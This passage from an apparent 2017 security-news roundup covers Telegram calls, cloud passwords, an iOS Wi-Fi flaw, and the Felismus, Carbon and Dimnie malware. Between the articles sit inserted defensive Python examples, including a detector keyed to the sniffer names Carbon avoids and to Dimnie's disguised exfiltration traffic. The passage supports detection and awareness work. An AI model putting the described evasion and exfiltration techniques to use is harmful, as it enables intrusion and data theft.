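    the emoji on the two phones no longer match. That mismatch is what the
    over-the-phone comparison is designed to surface."""
    alice_pub, bob_pub = dh_public(alice_priv), dh_public(bob_priv)
    if mallory_priv is None:
        return (sas_emoji(dh_shared(alice_priv, bob_pub)),
                sas_emoji(dh_shared(bob_priv, alice_pub)))
    mallory_pub = dh_public(mallory_priv)
    return (sas_emoji(dh_shared(alice_priv, mallory_pub)),
            sas_emoji(dh_shared(bob_priv, mallory_pub)))


if __name__ == "__main__":
    # Constructed private values; a real client draws them from a CSPRNG per call.
    honest = simulate_call(123456789, 987654321)
    intercepted = simulate_call(123456789, 987654321, mallory_priv=555555555)
    print("honest call:     ", " ".join(honest[0]), "|", " ".join(honest[1]))
    print("intercepted call:", " ".join(intercepted[0]), "|", " ".join(intercepted[1]))
```

The comparison only helps if it is actually done over the voice channel: an interceptor controls the data path but cannot change what the two people read to each other, which is the whole reason the check is placed on a human-verifiable channel.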
Voice Calls — Encrypted, Super-Fast and AI-Powered
What's more? Telegram assures its users that the audio quality of voice calls is kept as high as possible by using a peer-to-peer connection, the best audio codecs, and artificial intelligence.
Developers say that audio quality of the call is "superior to any of our competitors" by including an AI neural network.
So, each time you make a Voice Call, your Telegram app's AI neural network will optimize dozens of parameters based on technical information of your device and network such as network speed, ping times, packet loss percentage, to adjust the quality of your call and improve future calls on the given device and network.
"These parameters can also be adjusted during a conversation if there's a change in your connection," the company states. "Telegram will adapt and provide excellent sound quality on stable WiFi — or use less data when you walk into a refrigerator with bad reception."
Note: AI doesn't have access to the contents of the conversation, so your calls are completely secure.
Telegram Offers Complete Control & Video Compression
Unlike WhatsApp and Facebook, Telegram lets you control "who can and who can't call you with granular precision."
If you don't want anyone bothering you, you can simply switch voice calls off altogether, blocking anyone and even everyone from calling you.
Telegram also offers users direct control over the quality of the videos they share over the platform. You can adjust the compression and see the quality of the video before sending it to your friends.
You can also set the video compression rate as the default setting for all your future video uploads.
Telegram version 3.18 which includes new features, such as Voice Calling, is free to download for iPhone on the App Store and Android phone on the Google Play Store.


Cloud services are convenient. But they also carry risks

31.3.2017 Novinky/Bezpečnost Zabezpečení
Last week a scandal erupted around hackers threatening Apple that they would delete the data of hundreds of millions of iCloud users. This has reopened the debate on how important security is when storing photos, videos and other data online.
The iCloud service is very popular. On first launch it already offers the user the option of backing up contacts, messages, photos and other files automatically to a remote server (the cloud). This is especially useful if you lose your phone or tablet: you simply enter your credentials on the new device and all your data is back immediately, with nothing lost.

But the cloud also poses a certain risk, one that security experts have been pointing out regularly for the last several years. Because the data is not physically in your hands, someone else can get to it too. All it takes is knowing your e-mail and password. And that applies not only to iCloud but also to similar services operated by competing companies.

Do not underestimate the strength of a password
The risk is not only that you disclose the password to someone. A hacker can simply work the password out. Special programs from the hacking underground can crack a four-digit password made up of the digits zero to nine in two minutes, because the performance of dual-core and quad-core processors allows up to 100 possible combinations per second to be checked on an ordinary desktop machine.

A problem also arises when you use the same password for multiple services, for example e-mail, various discussion forums or social networks. If passwords leak from one of these services, cyber criminals can then very easily get into other services as well, for example directly into the server where private photos from your phone or tablet are automatically stored. They simply try the password on the most widely used services.

It is therefore necessary to realise that passwords are usually the first line of effective defence against the theft of sensitive personal data. The longer and more complex the password, the better. It is advisable to combine lower- and upper-case letters with numbers, and possibly special characters as well.

Two-step security comes in handy
A cloud account can also be secured by more sophisticated methods than just a strong password. Some providers of these services offer, for example, the option of sending a unique code with every login.

To access the data it is then not enough to know your e-mail address and password. It is also necessary to have your phone, to which the login code is sent. A similar security system is already a matter of course today for payments through online banking.

The ability to detect "uninvited guests" is no exception either. The moment someone tries to access your data from a device other than the one you confirmed during the initial setup, a notification is automatically sent to your e-mail. This function will not protect your data if the attacker has already gained access to it, but on the other hand they will not get any further sensitive content that you might upload to the cloud.
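The two server-side defences the article describes, locking an account after repeated failed guesses (which makes the "100 combinations per second" figure irrelevant for online guessing) and alerting on a login from a device that was not confirmed at setup, can be shown on constructed login events. This is an added example, not code from the article or from any cloud provider; the account names, device identifiers, event format, failure threshold and time window are all assumptions.

```python
"""Added example: a minimal account-protection monitor.

Implements, on constructed login events:
  * brute-force throttling: lock the account after MAX_FAILURES failed
    logins inside WINDOW_SECONDS, and
  * new-device alerts: a successful login from a device id that is not in
    the account's trusted set (confirmed at first setup) raises an alert.
All accounts, device ids and events are constructed sample data.
"""
from collections import defaultdict

MAX_FAILURES = 5       # assumption: lock after 5 failures in the window
WINDOW_SECONDS = 300   # assumption: failures are counted over 5 minutes


def brute_force_seconds(alphabet_size, length, guesses_per_second):
    """Worst-case time to try every combination of a fixed-length secret.
    For the article's numbers, a 4-digit PIN at 100 guesses/s is 100 s."""
    return alphabet_size ** length / guesses_per_second


class AccountMonitor:
    def __init__(self, trusted_devices):
        # trusted_devices: {account: {device_id, ...}} confirmed at setup
        self.trusted = {a: set(d) for a, d in trusted_devices.items()}
        self.failures = defaultdict(list)   # account -> failure timestamps
        self.locked = set()
        self.alerts = []                    # (account, kind, device)

    def handle(self, event):
        """event: {"ts": seconds, "account", "device", "result": "ok"|"fail"}.
        Returns the decision: 'allow', 'alert', 'deny' or 'locked'."""
        acct, now, dev = event["account"], event["ts"], event["device"]
        if acct in self.locked:
            return "locked"
        # keep only failures that are still inside the sliding window
        recent = [t for t in self.failures[acct] if now - t < WINDOW_SECONDS]
        if event["result"] != "ok":
            recent.append(now)
            self.failures[acct] = recent
            if len(recent) >= MAX_FAILURES:
                self.locked.add(acct)
                self.alerts.append((acct, "lockout", dev))
                return "locked"
            return "deny"
        # a successful login resets the failure counter
        self.failures[acct] = []
        if dev not in self.trusted.get(acct, set()):
            # the article's "uninvited guest" notification
            self.alerts.append((acct, "new-device", dev))
            return "alert"
        return "allow"


# Constructed sample: a guessing attack on "alice", then a login for "bob"
# from a device bob never confirmed.
SAMPLE_EVENTS = [
    {"ts": 0,  "account": "alice", "device": "phone-A1",   "result": "ok"},
    {"ts": 10, "account": "alice", "device": "unknown-9f", "result": "fail"},
    {"ts": 11, "account": "alice", "device": "unknown-9f", "result": "fail"},
    {"ts": 12, "account": "alice", "device": "unknown-9f", "result": "fail"},
    {"ts": 13, "account": "alice", "device": "unknown-9f", "result": "fail"},
    {"ts": 14, "account": "alice", "device": "unknown-9f", "result": "fail"},
    {"ts": 15, "account": "alice", "device": "unknown-9f", "result": "ok"},
    {"ts": 20, "account": "bob",   "device": "laptop-B7",  "result": "ok"},
]
SAMPLE_TRUSTED = {"alice": {"phone-A1"}, "bob": {"tablet-B2"}}


def run(events=SAMPLE_EVENTS, trusted=SAMPLE_TRUSTED):
    """Feed the events through the monitor; returns (decisions, alerts)."""
    mon = AccountMonitor(trusted)
    decisions = [mon.handle(e) for e in events]
    return decisions, mon.alerts


if __name__ == "__main__":
    for d, a in zip(*run()):
        print(d, a)
    print("4-digit PIN, 100 guesses/s:", brute_force_seconds(10, 4, 100), "s")
```

Note that the lockout fires on the fifth failure, so the later "successful" guess at ts=15 is refused even though the password was right; that is the point of the control. The new-device alert for bob is raised but the login is still allowed, matching the article's description of a notification rather than a block.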

Phones and tablets themselves are a risk too
But you can lose data stored on phones and tablets even if you don't use any cloud at all. Unlike with classic desktops and laptops, most people don't use any security software on them. And that is exactly why cybercriminals are targeting mobile devices more and more often.

In practice they may thus manage to smuggle some malicious virus into a tablet or smartphone, which lets them take control of the infected device and thereby gives them access to all the stored data as well. Without an antivirus, an ordinary user has practically no chance of noticing that their device has been infected.

Every tablet and smartphone should therefore be equipped with security software that constantly watches for all threats. Users should not forget to regularly download all security patches, both for the operating system itself and for installed programs. Attackers also exploit various holes in software to carry out attacks.


iPhones and iPads can be attacked by hackers. Connecting to Wi-Fi is enough

31.3.2017 Novinky/Bezpečnost Apple
The iOS operating system used by iPhone smartphones and iPad tablets contains a critical security hole. Cybercriminals can exploit it to smuggle practically any malicious code into the device. All they need is to be connected to the same Wi-Fi as their victim, for example on a free network in a café or shopping centre.
The bug only affects people who use an older version of iOS. (Illustrative photo)
How easily the hole can be exploited was demonstrated at the Black Hat hacker conference by researcher Marco Grassi of the security company Tencent.

"The cybercriminal takes advantage of the WebSheet system application, which after connecting to Wi-Fi automatically loads any so-called captive portal. They plant a WebKit vulnerability there and thereby invoke the iOS Diagnostics application, which already runs outside the sandbox. iOS Diagnostics loads a URL that the attacker forges, and through it compromises the device," said Pavel Bašta, security analyst at the national cyber security team CSIRT.CZ, describing the technical side of the attack.

Put simply, it is enough for the attacker to manage to connect to the same Wi-Fi network as their victim. They can then serve a fraudulent page to the iOS device, through which they smuggle any malicious code into it, and may even take control of it remotely.

It must be stressed, however, that only users who have not updated their operating system are at risk. The latest version of iOS has closed this back door into iPhones and iPads for cybercriminals.

A month full of bugs
March was certainly not rosy for Apple. The American computer giant released fixes for more than 200 security bugs, an absolute record.

The holes were not found only in systems for mobile devices but, for example, also in platforms for desktop computers. Moreover, the threat also concerns users who do not own any device with an Apple platform. The Safari web browser, which is also available for Windows machines, contains holes too.

Given the number of vulnerabilities discovered, users certainly should not delay installing the updates. In some cases attackers are already exploiting the bugs.


Modular Felismus RAT Emerges

31.3.2017 securityweek Virus
A newly discovered piece of malware features a modular design and has been used in highly targeted campaigns, Forcepoint security researchers reveal.

Dubbed Felismus, the malware is a well-written Remote Access Trojan (RAT) believed to have been created by professional cybercriminals. The threat packs numerous anti-analysis capabilities (including advanced encryption of network communication) and shows good 'operational hygiene' relating to the re-use of email addresses and other traceable artefacts, Forcepoint says.

The first available samples feature filenames mimicking those of Adobe's Content Management System (AdobeCMS.exe) and emerged several weeks ago, but the malware’s attacks can be dated six months before that. The attackers behind the malware and their targets remain opaque for the time being, but the RAT’s libraries appear to be actively exploited and the spotted attacks are believed to be part of a larger campaign.

The threat is capable of self-updating, while also being able to identify and evade a large number of anti-virus products, most of which are well-known brands. The malware packs capabilities typical of RATs, such as file upload, file download, file execution, and shell (cmd.exe) command execution. The malware can also create text files on the local machine.

At the time of publishing, 31 of 61 anti-virus products on VirusTotal detected the threat based on the hash provided by ForcePoint.

The security researchers note that the malware’s command and control (C&C) infrastructure is active and appears to be maintained, while also revealing that the RAT uses at least three separate encryption methods for its traffic, depending on the type of message.

A series of domains associated with the threat were found to return a fake WordPress.org page from 2013, and to feature falsified details, such as invalid Hong Kong-based telephone numbers and nonexistent street addresses. The email addresses used to register the domains haven’t been used anywhere else online, which confirms the degree of professionalism and good 'operational hygiene' these cybercriminals are practising.

“The malware analysed appears to be both modular and well-written, strongly suggesting that skilled attackers are responsible, while its apparent scarcity in the wild implies that it is likely highly targeted. On top of this, the good 'operational hygiene' relating to the re-use of email addresses and other similarly traceable artefacts suggests coordinated, professional actors and, at the time of writing, there is little to link it with any known campaigns (APT-linked or otherwise),” Forcepoint says.

The security researchers say that, while the malware is well-written, the use of a folder name 'datas' and a typo in the function name 'GetCurrtenUserName' suggest that English might not be the authors’ first language. They also discovered that the available malware samples appear to have been compiled using a December 2014 version of the open-source TDM-GCC compiler suite.

The analyzed sample performed a small number of functions and generated only a few unique log file entries, which could indicate that either the campaign is currently dormant or the malware behaves differently depending on the infected machine. The researchers also noticed that a C&C IP address appeared to selectively block one of the security firm’s exit IPs during the research.

“If the other modules and capabilities associated with the malware remain a matter of speculation, so too do the intended target(s). Of the five domains hosted on the C&C IP address identified within this post, three - cosecman[]com, nasomember[]com, and unmailhome[]com - have potential associations with the financial services sector; however, under this theory the naming of the remaining two domains - maibars[]com and mastalib[]com - remain unexplained,” Forcepoint concludes.


Turla Group Improves Carbon Backdoor

31.3.2017 securityweek Virus
The Russia-linked threat group known as Turla has continued to make improvements to its Carbon second-stage backdoor, with new versions released on a regular basis, ESET reported on Thursday.

Turla has been active since at least 2007 and is believed to be responsible for several high-profile attacks, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command. The group is also known as Waterbug, KRYPTON and Venomous Bear, and some of its primary tools are tracked as Turla (Snake and Uroburos) and Epic Turla (Wipbot and Tavdig).

Carbon, also known as Pfinet, is another tool used by the group and ESET has described it as a lite version of Uroburos. Carbon is a second-stage backdoor that is typically deployed after the reconnaissance phase of an attack, which involves malware such as Tavdig. Carbon was also used in the attack aimed at RUAG.

According to ESET, Carbon has several components, including a dropper, a command and control (C&C) communications element, an orchestrator, and a loader that executes the orchestrator. These components are mostly DLL files, except for the loader, which is an EXE file.

The security firm has identified several versions of Carbon compiled last year; the most recent has a compilation date of October 21, 2016.

ESET pointed out that Turla has been making changes to its tools once they are exposed. In the case of Carbon, file names and mutexes have been modified in version 3.8, released in the summer of 2016, compared to version 3.7, which had been used since 2014.

The main component of the Carbon framework is the orchestrator, which is used to inject the C&C communications library into a legitimate process, and dispatch the tasks received via the C&C library to other computers on the network. Before C&C communications are initiated, the malware checks the infected system for the presence of packet capture software, such as Wireshark and Tcpdump.

In addition to changed file names and mutexes, ESET said the newer versions of Carbon use more encryption, including for files and the names of modules, functions and processes.

In February, Kaspersky Lab revealed that the Turla group had started using a new piece of JavaScript malware to profile victims.


Linux Kernel Flaw Disclosed at Pwn2Own Patched

31.3.2017 securityweek Vulnerebility
The Linux kernel vulnerability leveraged at the Zero Day Initiative’s Pwn2Own 2017 competition to hack Ubuntu has been patched.

The flaw was disclosed at the event by researchers at Beijing-based enterprise security firm Chaitin Tech. The exploit, which earned the hackers $15,000, was part of the only attempt to break Ubuntu at this year’s Pwn2Own.

The vulnerability, tracked as CVE-2017-7184, has been described as an out-of-bounds heap access weakness that can be exploited to cause a denial-of-service (DoS) condition or to execute arbitrary code. A local attacker can exploit the flaw to escalate privileges on the system.

“The specific flaw exists within the handling of xfrm states,” ZDI explained in its advisory. “The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer.”

The vulnerability was addressed in the Linux kernel a few days after Pwn2Own ended. Ubuntu has released fixes and other Linux distributions are working on patches as well.

Red Hat has classified it “high severity,” but pointed out that the flaw cannot be exploited for privilege escalation on default or common configurations of Red Hat Enterprise Linux 5, 6 and 7.

Mozilla and VMware have also patched the Firefox and Workstation vulnerabilities disclosed at Pwn2Own, and ZDI has made its advisories public for these security holes.


Turla hacking group continues to improve its Carbon backdoor
31.3.2017 securityaffairs Virus

The Russian group Turla has continued to improve its Carbon backdoor, experts from ESET detected new versions released on a regular basis.
The Russian APT group known as Turla (also known as Waterbug, KRYPTON and Venomous Bear) has continued to improve its Carbon backdoor, experts from ESET detected new versions released on a regular basis.

Carbon is a second-stage backdoor that is used after the initial reconnaissance phase of an attack; that reconnaissance phase involves malware such as Tavdig.

Turla’s arsenal is composed of sophisticated hacking tools and malware tracked as Turla (Snake and Uroburos rootkit), Epic Turla (Wipbot and Tavdig) and Gloog Turla. In June 2016, researchers from Kaspersky reported that the Turla APT had started using Icedcoffee, a JavaScript payload delivered via macro-enabled Office documents.

The last time researchers reported on Turla‘s activities was in February 2017, when experts at Kaspersky Lab discovered a new piece of JavaScript malware linked to the group targeting organizations in Greece, Qatar, and Romania.

Turla has been active since at least 2007; the hackers have launched several high-profile attacks against targets worldwide, including the ones aimed at Swiss defense firm RUAG and the U.S. Central Command.

Carbon, aka Pfinet, is one of the tools in the arsenal of the hacking crew; researchers from ESET described it as a lite version of Uroburos.

Carbon is a second-stage backdoor that is typically deployed after the reconnaissance phase of an attack. It has several components, including a dropper, a command and control (C&C) communications element, an orchestrator, and a loader that executes the orchestrator.

The orchestrator is used to inject the C&C communications library into a legitimate process, and dispatch the tasks received via the C&C library to other bots that are located on the network.


ESET has identified several versions of Carbon compiled last year; the most recent one was compiled on October 21, 2016. The newer versions of the Carbon malware make heavy use of encryption.

Almost every component is a DLL file, except for the loader, which is an EXE file.

“The Turla group is known to be painstaking and work in stages, first doing reconnaissance on their victims’ systems before deploying their most sophisticated tools such as Carbon.

A classic Carbon compromise chain starts with a user receiving a spearphishing email or visiting a previously compromised website, typically one that the user visits regularly — a technique known as a watering hole attack.” reads the analysis shared by ESET.
“After a successful attack, a first stage backdoor — such as Tavdig or Skipper — is installed on the user machine. Once the reconnaissance phase is over, a second stage backdoor, like Carbon, is installed on key systems.”
The threat actors behind Turla have modified their tools every time they were detected in the wild. Researchers observed that in the case of Carbon, the hackers changed file names and mutexes in version 3.8, released in the summer of 2016.

Experts noticed that before the malware starts communicating with the C&C, it checks the infected system for the presence of packet capture software, such as Wireshark and Tcpdump.

“Before communicating with the C&C server or with other computers, the malware ensures that none of the most common packet capture software is running on the system:
TCPdump.exe
windump.exe
ethereal.exe
wireshark.exe
ettercap.exe
snoop.exe
dsniff.exe”
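The list of sniffer process names quoted above is itself a usable indicator: legitimate software rarely embeds the names of several packet-capture tools, so a binary that carries most of them, in ASCII or in the UTF-16LE that Windows APIs use, deserves a closer look. The following heuristic scanner is an added example, not ESET's or the article's code; the sample buffers are constructed and the hit threshold is an assumption.

```python
"""Added example: flag files that embed the packet-capture process names
ESET quotes for Carbon, in either ASCII or UTF-16LE encoding.

The process-name list is taken from the article; the threshold and the
sample buffers are constructed assumptions.
"""

# Process names quoted in the ESET analysis above (case-insensitive match).
CAPTURE_TOOLS = [
    "TCPdump.exe", "windump.exe", "ethereal.exe", "wireshark.exe",
    "ettercap.exe", "snoop.exe", "dsniff.exe",
]
MIN_HITS = 4   # assumption: four or more distinct names is suspicious


def find_capture_tool_strings(data: bytes) -> set:
    """Return the subset of CAPTURE_TOOLS present in data.

    bytes.lower() only folds ASCII letters, so it also normalises the
    letters of UTF-16LE text without disturbing the interleaved NUL bytes.
    """
    low = data.lower()
    hits = set()
    for name in CAPTURE_TOOLS:
        n = name.lower()
        if n.encode("ascii") in low or n.encode("utf-16-le") in low:
            hits.add(name)
    return hits


def looks_like_sniffer_check(data: bytes) -> bool:
    """True when enough distinct sniffer names appear in the same file."""
    return len(find_capture_tool_strings(data)) >= MIN_HITS


def scan_file(path: str) -> dict:
    """Scan one file on disk; returns the hits and the verdict."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = find_capture_tool_strings(data)
    return {"path": path, "hits": sorted(hits),
            "suspicious": len(hits) >= MIN_HITS}


# Constructed sample buffers standing in for file contents.
BENIGN_SAMPLE = (b"MZ\x90\x00" +
                 b"ReadFile\x00WriteFile\x00CreateProcessW\x00tcpdump.exe\x00")
SUSPICIOUS_ASCII = b"MZ\x90\x00" + b"\x00".join(
    n.encode("ascii") for n in CAPTURE_TOOLS)
SUSPICIOUS_UTF16 = b"MZ\x90\x00" + b"".join(
    n.encode("utf-16-le") + b"\x00\x00"
    for n in ["WireShark.exe", "Ettercap.exe", "DSniff.exe", "Windump.exe"])


if __name__ == "__main__":
    for label, buf in [("benign", BENIGN_SAMPLE),
                       ("ascii", SUSPICIOUS_ASCII),
                       ("utf16", SUSPICIOUS_UTF16)]:
        print(label, sorted(find_capture_tool_strings(buf)),
              looks_like_sniffer_check(buf))
```

A single name (the benign sample mentions tcpdump.exe once) is not enough to trigger; packet-capture tools themselves and some management agents will legitimately reference one or two of these names, which is why the rule counts distinct names rather than any occurrence. Case folding matters because the quoted list mixes "TCPdump.exe" with lower-case names, and a compiled sample may carry either.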


Owners of GitHub repositories targeted by the Dimnie data-stealer malware
31.3.2017 securityaffairs Virus

Since mid-January, attackers have targeted owners of GitHub repositories with the Dimnie data-stealer malware. It is a relatively unknown threat actor.
Attackers have targeted developers who own GitHub repositories with data-stealing malware called Dimnie. The malicious code includes keylogging features and modules that capture screenshots.

The Dimnie malware was spotted by researchers at Palo Alto Networks in mid-January when an unknown number of developers were targeted with emails purporting to be job offers. The malicious messages used weaponized .doc files containing an embedded malicious macro that executed a PowerShell command that would start the attack by downloading and executing the malicious code.

The Dimnie data stealer has been in circulation since 2014, primarily against Russian-speaking targets. The researchers do not know how widespread the malware campaign was, and the motivation for the attack is also a mystery. The attackers were probably searching for something of interest among the huge number of projects hosted on the platform.

“Dimnie, the commonly agreed upon name for the binary dropped by the PowerShell script above, has been around for several years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control mechanisms. The malware family serves as a downloader and has a modular design encompassing various information stealing functionalities.” reads the analysis published by Palo Alto Networks. “Each module is injected into the memory of core Windows processes, further complicating analysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign.”

Experts believe that the attack was carried out by a “relatively unknown threat” outside of the Russian-speaking world.

Dimnie disguises its HTTP requests to the command and control server as GET requests to a defunct Google service called Google PageRank. The researchers discovered that the IP address returned by the DNS lookup preceding the GET request was not the real destination IP of the follow-up HTTP request.

“Sending the request to an entirely different server is not complicated to achieve, but how many analysts would simply see a DNS request with no related subsequent traffic? That is precisely what Dimnie is relying upon to evade detections,”

The attackers used a similar technique to exfiltrate data; the request is in fact disguised as a POST request to Google.

“Data exfiltration by the associated modules is performed using HTTP POST requests to another Google domain, gmail[.]com. However, just like the module downloader portion of the malware, these HTTP requests are hardcoded to be sent to an attacker controlled server. Again, Dimnie attempts to blend in by looking at least somewhat legitimate, although the data exfiltration traffic is far less convincing than that of the module downloads.” continues the analysis.

Dimnie belongs to the category of fileless malware. The researchers discovered nine modules, including some that extract system data, enumerate running processes, log keystrokes and take screenshots, and a self-destruct module that deletes all files on the local drive.
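The evasion described above, a DNS lookup for a Google name followed by an HTTP request whose Host header names that same Google domain but whose packets go to a hardcoded, unrelated address, is exactly the kind of mismatch a network sensor can catch by joining DNS answers with the connections that follow them. The detector below is an added example, not Palo Alto Networks' code; the log format, client addresses, resolved addresses (documentation ranges) and the "pagerank.google.example" name are constructed, while gmail.com is the domain the analysis itself names.

```python
"""Added example: correlate DNS answers with subsequent HTTP connections
and flag requests whose destination IP was never returned for the Host
header the client claims to be talking to (the Dimnie pattern), plus the
inverse tell quoted in the analysis: DNS answers that see no traffic.

Log lines, hostnames other than gmail.com, and all addresses are
constructed sample data; the key=value format is an assumption.
"""
from collections import defaultdict

DNS_LOG = [
    "2017-01-20T10:00:01 dns client=10.1.1.5 qname=pagerank.google.example answer=198.51.100.10",
    "2017-01-20T10:00:05 dns client=10.1.1.5 qname=gmail.com answer=198.51.100.20",
    "2017-01-20T10:01:00 dns client=10.1.1.6 qname=gmail.com answer=198.51.100.20",
]
HTTP_LOG = [
    # module download disguised as a PageRank query, sent to a hardcoded IP
    "2017-01-20T10:00:02 http client=10.1.1.5 dst=203.0.113.7 host=pagerank.google.example method=GET path=/tbr?client=navclient",
    # exfiltration disguised as a POST to gmail.com, same hardcoded IP
    "2017-01-20T10:00:06 http client=10.1.1.5 dst=203.0.113.7 host=gmail.com method=POST path=/upload",
    # a normal client: destination matches what DNS returned
    "2017-01-20T10:01:01 http client=10.1.1.6 dst=198.51.100.20 host=gmail.com method=GET path=/",
    # a client that never resolved the name at all
    "2017-01-20T10:02:00 http client=10.1.1.7 dst=203.0.113.9 host=gmail.com method=POST path=/upload",
]


def parse(line: str) -> dict:
    """Parse 'TIMESTAMP KIND key=value ...' into a dict."""
    ts, kind, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"], rec["kind"] = ts, kind
    return rec


def resolved_map(dns_lines):
    """(client, qname) -> set of answer IPs that client actually received."""
    resolved = defaultdict(set)
    for rec in map(parse, dns_lines):
        resolved[(rec["client"], rec["qname"].lower())].add(rec["answer"])
    return resolved


def detect_host_ip_mismatch(dns_lines, http_lines):
    """Return one finding per HTTP request whose dst IP does not come from
    a DNS answer the same client received for the claimed Host."""
    resolved = resolved_map(dns_lines)
    findings = []
    for rec in map(parse, http_lines):
        answers = resolved.get((rec["client"], rec["host"].lower()))
        if answers is None:
            reason = "no_dns_for_host"
        elif rec["dst"] not in answers:
            reason = "dst_not_resolved"
        else:
            continue
        findings.append({"ts": rec["ts"], "client": rec["client"],
                         "host": rec["host"], "dst": rec["dst"],
                         "method": rec["method"], "reason": reason})
    return findings


def unused_resolutions(dns_lines, http_lines):
    """DNS answers that the resolving client never connected to: the
    'DNS request with no related subsequent traffic' the quote mentions."""
    contacted = {(r["client"], r["dst"]) for r in map(parse, http_lines)}
    unused = []
    for (client, qname), ips in resolved_map(dns_lines).items():
        for ip in ips:
            if (client, ip) not in contacted:
                unused.append((client, qname, ip))
    return sorted(unused)


if __name__ == "__main__":
    for f in detect_host_ip_mismatch(DNS_LOG, HTTP_LOG):
        print("MISMATCH", f)
    for u in unused_resolutions(DNS_LOG, HTTP_LOG):
        print("UNUSED DNS ANSWER", u)
```

The first rule is the strong one: on a proxy or flow log that records both the Host header and the real destination, a client talking to a Google name at a non-Google address is rare enough to page on. The unused-answer rule is noisier (caching, prefetching and CDN rotation all produce orphan lookups), so it is better used as corroboration for a host already flagged by the first rule than as an alert on its own.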


The command and control infrastructure used in the attacks is still active and according to the experts Dimnie continues to be used against Russian-speaking targets.

“Multiple factors have contributed to Dimnie’s relatively long-lived existence. By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders’ assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown.”


Samsung Galaxy S8 facial recognition system to unlock the device can be bypassed with a photo
31.3.2017 securityaffairs Mobil

Users can unlock Samsung Galaxy S8 phone by holding their Samsung Galaxy S8 in front of their eyes or their face … or their image.
It looks like a film we have seen before: an IT giant presents a new product and hackers defeat its security measures. This time we are speaking of the Samsung Galaxy S8 and Galaxy S8 Plus, presented at the Unpacked 2017 event this week in New York, a jewel that includes both IRIS and facial recognition features. These features are meant to improve the owner’s security and experience, making it simple to unlock the device and sign in to websites.

The users can unlock their phone by holding their Samsung Galaxy S8 or Samsung Galaxy S8 Plus in front of their eyes or their face.

Cool, but we have already seen in the past that biometric technology can be bypassed by hackers, including fingerprint scanners and IRIS scanners.


Similar problems seem to affect the implementation of the biometric technology Samsung uses for facial recognition. YouTube vlogger iDeviceHelp posted a video on his channel in which the user Marcianotech demonstrated how to unlock a Samsung Galaxy S8 or Galaxy S8 Plus by taking the device owner’s picture from Facebook and presenting the image to the locked phone.

Currently there is no exact information about the resolution of the image used in the test, nor about the distance between the phone and the camera.

The company hasn’t commented on the video, probably because it is still working on the feature and the software tested is likely a beta version. Samsung will surely address the problem before the device becomes available on the market on April 21.


FBI Chief's Secret Twitter Account Outed?

31.3.2017 securityweek BigBrothers
When Federal Bureau of Investigation Director James Comey teased that he had joined the world of social media with secret Facebook and Twitter accounts, tech writer Ashley Feinberg took the dare.

After four hours of FBI-level sleuthing, she was pretty sure she had the answer: On both he was using the name of US Protestant theologian Reinhold Niebuhr. Embarrassing: He had only one Twitter follower.

All it took, Feinberg said on the Gizmodo website where she is a senior reporter, was for Comey to tell an audience of security professionals Wednesday night that he had very cautiously joined the social networking age to keep up with family.

"I care deeply about privacy, treasure it. I have an Instagram account with nine followers. Nobody is getting in. They're all immediate relatives, and one daughter's serious boyfriend," Comey let slip.

Feinberg was piqued. "Who am I to say no to a challenge?" she wrote. She tracked down Comey's family members, eventually discovering his son Brien's Instagram account by way of a photo of him with an Instagram tag.

That led to a potential dead end: A protected account which she could not view.

But when she asked to be invited by Brien Comey to view his account, Instagram popped up with offers to follow other accounts that included Brien's mother and a mysterious "Reinhold Niebuhr," who had just nine followers.

And a Google check easily showed that Niebuhr was the subject of James Comey's 1982 university thesis.

The FBI chief, who carries the mammoth political burden of investigating the Trump administration's suspected links to Russia as both political parties eye him suspiciously, unsurprisingly also had a protected account.

But from there to Twitter was easy. Feinberg found seven Niebuhrs there, but only one with a secretive identity: @projectexile7. That was the name of a program to battle gun-related crime that Comey helped develop.

That account had no tweets in three years, and followed only 27 other accounts. But those were reporters who cover the FBI, and law enforcement-related accounts. And Donald Trump.

And the one follower was a prominent expert in national security law and a friend of Comey's. Bingo.

So much for secrecy. The FBI had no comment late Thursday, but the Twitter-verse was convinced. Hours after Feinberg's report, Comey had more than 8,000 followers. Pretty good for never tweeting.


Google Patches Dangerous Vulnerabilities in Chrome 57

31.3.2017 securityweek Vulnerebility
Google on Wednesday released an update for its Chrome web browser to address five vulnerabilities in the application: one rated Critical and four High risk.

Chrome 57.0.2987.133 was released for Windows, Mac, and Linux users just weeks after version 57 of the browser graduated to the stable channel. In addition to bringing several functionality improvements, the previous browser release included the availability of CSS Grid Layout, along with patches for 36 vulnerabilities.

The most severe bug resolved in the new update is a Critical Use after free vulnerability in printing. Tracked as CVE-2017-5055, the issue was discovered by Wadih Matar, who was awarded a $9,337 bounty for the finding, according to Google’s advisory.

The first of the four High risk flaws resolved in this release is a Heap buffer overflow in V8 (CVE-2017-5054), discovered by Nicolas Trippar of Zimperium zLabs and awarded a $3000 bounty. Another was a Bad cast in Blink (CVE-2017-5052), found by JeongHoon Shin and awarded $1000.

The other two flaws included a Use after free in Blink (CVE-2017-5056), discovered by a researcher who opted to remain anonymous, and an Out of bounds memory access in V8 (CVE-2017-5053), found by Team Sniper (Keen Lab and PC Mgr) and reported through ZDI (ZDI-CAN-4587). Google didn’t reveal the bounties paid for these two issues.

A new version of Chrome for Android (57.0.2987.132) was also released this week to address a High risk Use after free vulnerability in Blink (CVE-2017-5056).

In late January, Google released Chrome 56 in the stable channel to resolve 51 vulnerabilities in the browser. Roughly two weeks later, the Internet giant announced that Gmail was dropping support for Chrome version 53 and below, hitting Windows XP and Vista users hard (Chrome 49 was the last browser iteration released for these platforms).


Pro-ISIS Amaq News Site Hacked to Serve Malware

31.3.2017 securityweek CyberCrime
Amaq News Agency Hacked

The Islamic State-affiliated Amaq news agency on Thursday said that a server hosting its propaganda and news content had been hacked, and warned that visitors were being prompted to download a malicious FlashPlayer file.

The details of the malicious file are unknown, but the Islamic State (also known as IS, ISIS, ISIL, and Daesh) news site has been a target of anti-ISIS groups in the past.

